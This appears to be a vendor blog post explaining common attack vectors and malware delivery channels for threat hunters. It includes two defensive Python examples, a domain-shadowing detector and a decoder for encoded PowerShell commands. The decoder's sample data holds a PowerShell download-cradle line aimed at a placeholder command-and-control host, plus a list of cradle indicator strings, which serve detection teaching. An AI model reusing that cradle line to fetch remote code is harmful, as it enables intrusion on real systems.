It’s generally accepted that the best defense is a good offense. In cybersecurity terms that means taking a more proactive approach to catching our cyber adversaries. Cyber threat hunting is an effective method for searching your network for malware and other threats that have evaded traditional security defenses. To be a successful threat hunter it’s important to understand the adversaries we’re facing, as well as the tricks and techniques they use. Let's take a look at a few.
Common Attack Vectors
Hackers have many tools in their arsenal for gaining access to a computer or network server. Here are some attack vectors that cybercriminals commonly use to deliver a payload and/or exploit system vulnerabilities.
Phishing
Using an email disguised as a legitimate message, hackers entice the recipient either to open an infected attachment or to click a link that leads to an infected website. The goal is to lure individuals into giving up sensitive data such as personally identifiable information, banking and credit card numbers, and passwords. Phishing accounts for 90% of all successful cyberattacks.
Malware
Malware, short for “malicious software,” is software (or a script or code) designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems and mobile devices. Malware is a tool of choice for hackers because it's effective, easy to use, and readily available. The many types of malware differ in how they infect systems and how they propagate.
Drive-by Download
In a drive-by download, malware is inadvertently downloaded from a legitimate site that has been compromised, without any deliberate action from the user. It can happen when visiting a website, viewing an e-mail message, or clicking on a deceptive pop-up window. It typically takes advantage of vulnerabilities in the user’s operating system or another program.
Distributed Denial-of-Service (DDoS)
A DDoS is an attempt to make a machine or network resource unavailable for its intended use. It either consumes more resources than the target can handle or disrupts it by disabling communication services. It's typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
Domain Shadowing
First the hacker obtains domain registrar credentials through a successful attack, usually phishing. This lets them add host records (subdomains) under an organization’s legitimate domain and point those records at IP addresses they control.
For example, let's say you've determined that you will never worry about traffic to "somelocalcompany.com," and you whitelist the domain. That company falls victim to domain shadowing, and now you may have traffic going to "somemalicioushostinrussia.somelocalcompany.com" without even noticing it. So much for whitelisting by domain! Your systems are headed out to Russia to pick up some nasty code!
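One defensive counter to the scenario above is to stop trusting an allowlisted domain wholesale and instead flag any hostname under it that has never been seen before. The following is an added example, not code from the original article; the log format, the allowlist, the baseline of known hostnames and the sample query lines are all constructed here.

```python
"""Flag never-before-seen hostnames under allowlisted domains in DNS query logs."""
from collections import defaultdict

# Constructed allowlist: registered domains an analyst decided to trust wholesale.
ALLOWLISTED_DOMAINS = {"somelocalcompany.com"}

# Constructed baseline: hostnames under those domains observed during a clean period.
KNOWN_HOSTNAMES = {"www.somelocalcompany.com", "mail.somelocalcompany.com"}

# Constructed DNS query log lines: "<timestamp> <client_ip> <qname> <qtype>"
SAMPLE_DNS_LOG = """\
2024-03-01T09:00:01Z 10.0.0.15 www.somelocalcompany.com A
2024-03-01T09:00:07Z 10.0.0.22 mail.somelocalcompany.com A
2024-03-01T09:02:44Z 10.0.0.15 somemalicioushostinrussia.somelocalcompany.com A
2024-03-01T09:03:10Z 10.0.0.31 cdn.example.net A
2024-03-01T09:05:55Z 10.0.0.22 update7.somelocalcompany.com A
"""


def registered_domain(qname: str) -> str:
    """Return the last two labels of a name (e.g. 'somelocalcompany.com').

    Assumption: two-label registered domains. A production version would use
    the Public Suffix List so that names like 'example.co.uk' are handled.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def find_shadowed_hosts(log_text: str, allowlist=ALLOWLISTED_DOMAINS, known=KNOWN_HOSTNAMES):
    """Return {qname: [client_ips]} for unknown hosts under allowlisted domains."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines instead of crashing on them
        _ts, client_ip, qname, _qtype = parts[:4]
        qname = qname.rstrip(".").lower()
        base = registered_domain(qname)
        # Only allowlisted domains need this check; other traffic is already reviewed.
        if base in allowlist and qname != base and qname not in known:
            hits[qname].append(client_ip)
    return dict(hits)


if __name__ == "__main__":
    for host, clients in find_shadowed_hosts(SAMPLE_DNS_LOG).items():
        print(f"review: new host under allowlisted domain {host} queried by {', '.join(clients)}")
```

Every hit is a review item, not a verdict: "update7" in the sample may be a legitimate new host, which is exactly why the baseline must be maintained rather than the whole domain trusted.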
Malvertising
These are online ads that are owned by cybercriminals. Malicious software is downloaded onto the user’s system when they click the infected ad, which can appear on any site, even popular ones. The user is often redirected to an exploit kit landing page, and the exploit kit can load malware onto the system without user consent. Often the victim is unaware that anything suspicious happened.
Common Delivery Channels
Opening a phishing email usually isn’t enough to get a user infected with malware. Typically users must open an infected attachment or click a malicious link that takes them to a compromised website. Once action is taken, the malware is delivered. Following are three common malware delivery channels.
Macros
Macros are code embedded within another program to automate repetitive tasks. Hiding malicious macros inside Microsoft Office documents, such as Word files, used to be the prevailing technique for launching attacks. Though Microsoft has since added security features that greatly reduce the effectiveness of macro-based malware, the technique is still in use. Malware is installed when the recipient opens the infected document and allows the macro to run.
Exploit Kits
An exploit kit is a software system that runs on web servers with the purpose of identifying software vulnerabilities in a visiting client’s machine and exploiting the vulnerabilities it discovers. It’s a tool that hackers use to break in – like picking a lock. Once a vulnerability is exploited, the kit delivers and executes a variety of malicious code on the victim's machine. Kits are sold in cybercriminal circles, often with exploits already loaded onto them, and are extremely easy to use.
Learn more in Exploit Kit 101 - What You Need to Know.
Fileless Malware / Non-Malware
Fileless malware is not really fileless; it just isn’t delivered as an executable file (.exe). When you are compromised using this technique, there isn’t a malicious program sitting on your PC. It operates by using legitimate programs, typically PowerShell, for malicious purposes. A malicious encoded script can be decoded and run by PowerShell, which then reaches out to a command and control (C&C) server without writing any files to the local hard drive.
Learn more in What you Need to Know about Fileless Malware.
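Because nothing lands on disk, the place to hunt for this technique is process-creation telemetry: decode the encoded PowerShell command line and look at what it would actually run. The following is an added example, not code from the original article or the linked guide; the process events, the placeholder C&C hostname and the short indicator list are constructed and illustrative.

```python
"""Decode -EncodedCommand PowerShell launches and flag download-cradle indicators."""
import base64
import re
from typing import Optional

# Small, illustrative subset of strings that indicate fetching remote content in memory.
DOWNLOAD_CRADLE_INDICATORS = (
    "net.webclient", "downloadstring", "downloadfile",
    "invoke-expression", "frombase64string", "bitstransfer",
)

# Common spellings of the encoded-command switch (full name plus usual abbreviations).
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand payload; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Return the decoded script (if any) and the indicators it matches.

    Matching runs over the decoded text, so an analyst sees what would execute
    instead of an opaque base64 blob; plaintext command lines are checked as-is.
    """
    m = ENCODED_FLAG.search(cmdline)
    decoded = decode_command(m.group(1)) if m else None
    haystack = (decoded if decoded is not None else cmdline).lower()
    matched = [ind for ind in DOWNLOAD_CRADLE_INDICATORS if ind in haystack]
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": matched, "suspicious": bool(matched)}


# Constructed process-creation events (C&C host is a placeholder, not a real indicator).
SAMPLE_SCRIPT = "$r = (New-Object Net.WebClient).DownloadString('http://c2.placeholder.invalid/beacon')"
SAMPLE_PROCESS_EVENTS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -enc " + encode_command(SAMPLE_SCRIPT),
    "powershell.exe -EncodedCommand " + encode_command("Get-Service | Where-Object Status -eq 'Running'"),
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for event in SAMPLE_PROCESS_EVENTS:
        print(analyze_command_line(event))
```

Encoding alone is not malicious (administrators use it too), which is why the second sample event decodes cleanly but is not flagged; the decision rests on what the decoded script does.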
THE SAGE ADVICE GUIDE TO CYBER THREAT HUNTING
As cyberattacks continue to soar, it's time to get proactive when protecting your network. You can’t simply sit back and wait for an automated alert to let you know you’ve been breached. You need to actively seek out potentially malicious behavior on your network. That’s why we’re seeing a shift to a more proactive approach... Cyber Threat Hunting. Learn how to defend your network. Learn more in the Sage Advice Guide to Cyber Threat Hunting.